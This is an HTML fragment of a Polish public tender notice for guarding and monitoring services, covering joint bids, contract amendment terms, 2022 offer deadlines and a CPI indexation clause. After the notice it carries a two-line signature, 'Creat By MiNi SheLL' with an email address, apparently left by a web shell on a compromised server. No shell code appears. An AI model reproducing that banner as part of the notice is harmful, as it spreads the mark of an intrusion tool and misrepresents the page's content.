zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takiej sytuacji zobowiązani<br/>są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współpracę tych wykonawców w formie oryginału lub kopii poświadczonej za<br/>zgodność z oryginałem przez Wykonawcę.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>a) oświadczenie, o którym mowa w rozdz. V ust. 2 pkt 1 SWZ składa każdy z Wykonawców,<br/>b) dokumenty, o których mowa w rozdz. V ust. 2 pkt 2 SWZ składa każdy z Wykonawców,<br/>c) Wykonawcy dodatkowo zobowiązani są złożyć oświadczenie, o którym mowa w rozdz. V ust. 2 pkt 3 SWZ,<br/>d) oświadczenie, o którym mowa w rozdz. V ust. 3 pkt 3 SWZ składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony dopuszczają możliwość dokonania zmian postanowień umowy w szczególności <br/>w nastepującycych okolicznościach:<br/>1)	w zakresie zmiany terminu realizacji zamówienia poprzez jego przedłużenie o maksymalnie 12 miesięcy w przypadku uzasadnionej okolicznościami zmiany potrzeb Zamawiającego w zakresie ochrony fizycznej mienia oraz monitoringu; <br/>2)	w przypadku zmiany przeznaczenia nieruchomości podlegającej ochronie lub <br/>w przypadku zmian dokonanych na nieruchomości (m.in. umieszczeniu nowych urządzeń, obiektów, budynków, budowli lub usunięciu dotychczasowych) uzasadniających zmianę formy świadczenia usługi ochrony - poprzez zmianę zakresu zamówienia polegającą na:<br/>a)	rezygnacji z monitoringu,<br/>b)	rozpoczęcia realizacji usługi w formie monitoringu,<br/>c)	rezygnacji z realizacji usługi w formie ochrony fizycznej polegającej na obecności pracownika ochrony na nieruchomości (posterunku),<br/>d)	ustanowieniu realizacji usługi w formie ochrony fizycznej polegającej na obecności pracownika ochrony na nieruchomości (posterunku),<br/>e)	ustanowieniu dodatkowego pracownika ochrony posterunku w zakresie zwiększenia obsady ponad wymagania określone w tabelach zawartych w opisie przedmiotu zamówienia,<br/>3)	w zakresie zmiany wysokości wynagrodzenia w przypadku wskazanym w pkt 1 <br/>z zastrzeżeniem, iż zmianie może ulec wartość umowy określona w § 5 ust. 1 Umowy. <br/>Miesięczne rozliczenie z Wykonawcą nastąpi według stawek określonych w § 5 ust. 2 Umowy.<br/>4)	w zakresie zmiany wysokości wynagrodzenia określona w § 5 ust. 1 Umowy jak również stawek określonych w § 5 ust. 2 Umowy w przypadku zmiany:<br/>a)	stawki podatku od towarów i usług,<br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, <br/>o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342 oraz z 2022 r. poz. 1079)<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>Z uwagi na ograniczoną liczbę znaków ciąg dalszy znajduje się w pozostałych informacjach. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-09 10:15</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pierog.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2.	W przypadku zmiany, o której mowa w pkt 4 lit a-d powyżej, Wykonawca wraz z propozycją wprowadzenia zmiany poza uzasadnieniem jej dokonania przekaże Zamawiającemu:<br/>a)	wskazania podstawy prawnej stanowiącej podstawę poniesienia wyższych kosztów wykonania usługi,<br/>b)	sposób kalkulacji cen proponowanych wraz z informacjami dotyczącymi sposobu ich obliczenia z uwzględnieniem wskazania kosztów wynikających z okoliczności, o których mowa w lit. a powyżej. <br/>3.	Strona zainteresowana zmianą Umowy prześle drugiej Stronie propozycję wprowadzenia zmiany zawierającą uzasadnienie jej dokonania. <br/>4.	Strona, do której została skierowana propozycja wprowadzenia zmiany odniesie się do treści propozycji w terminie 21 dni od dnia otrzymania pisma. <br/>5.	Zmiana w zakresie wysokości wynagrodzenia, o której mowa w ust. 1 pkt 4 nie przekroczy kwoty wynikającej ze zmian przepisów prawa, stanowiących podstawę wprowadzenia zmiany i będzie obowiązywać od dnia wejścia w życie zmienionych przepisów.<br/>6.	Wynagrodzenie - określone w § 5 ust. 1 Umowy jak również stawki określone w § 5 ust. 2 Umowy - będzie waloryzowane o wskaźnik cen towarów i usług konsumpcyjnych ogłaszany w komunikacie Prezesa Głównego Urzędu Statystycznego (dalej jako „Wskaźnik waloryzacji”), przy łącznym spełnieniu następujących postanowień: <br/>1)	każda ze Stron Umowy jest uprawniona do żądania zmiany wysokości wynagrodzenia, przy czym waloryzacja nastąpi na wniosek Strony, przy czym <br/>2)	Strona może wystąpić z wnioskiem o pierwszą waloryzację po 6 miesiącach od podpisania Umowy oraz przy wzroście lub obniżeniu Wskaźnika waloryzacji określonego powyżej, o co najmniej 2%, obliczonego na podstawie średniej Wskaźników waloryzacji za 2 ostatnie kwartały poprzedzające złożenie wniosku <br/>o waloryzację; w przypadku wzrostu lub obniżenia Wskaźnika waloryzacji waloryzacja będzie polegała odpowiednio na wzroście lub obniżeniu wynagrodzenia za usługi realizowane po dniu złożenia wniosku o wartość procentową Wskaźnika waloryzacji, przy czym <br/>3)	Strona może wystąpić z wnioskiem o każdą kolejną waloryzację nie wcześniej niż po upływie 6 miesięcy od poprzedniej waloryzacji oraz przy wzroście lub obniżeniu Wskaźnika waloryzacji o co najmniej 2%, obliczonego na podstawie średniej Wskaźników waloryzacji za 2 ostatnie kwartały poprzedzające złożenie wniosku <br/>o waloryzację; w przypadku wzrostu lub obniżenia Wskaźnika waloryzacji waloryzacja będzie polegała odpowiednio na wzroście lub obniżeniu wynagrodzenia za usługi realizowane po dniu złożenia wniosku o Wskaźnik waloryzacji obliczony na podstawie średniej Wskaźników waloryzacji za 2 ostatnie kwartały poprzedzające złożenie wniosku o waloryzację, przy czym <br/>4)	waloryzacja nie dotyczy usług zrealizowanych przed datą złożenia wniosku przez którąkolwiek ze Stron, przy czym <br/>5)	w przypadku likwidacji Wskaźnika waloryzacji lub zmiany podmiotu, który urzędowo go ustala, mechanizm, o którym mowa powyżej, stosuje się odpowiednio do wskaźnika i podmiotu, który zgodnie z odpowiednimi przepisami prawa zastąpi dotychczasowy Wskaźnik lub podmiot, przy czym <br/>6)	maksymalna wartość zmiany wynagrodzenia brutto, jaką dopuszcza Zamawiający <br/>w efekcie zastosowania niniejszych postanowień, nie przekroczy 5% wynagrodzenia brutto Wykonawcy, ustalonego w dniu zawarcia Umowy. <br/><br/>Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności. <br/><br/>Szczegółowy opis zawiera Załącznik nr 8 do SWZ - Wzór umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com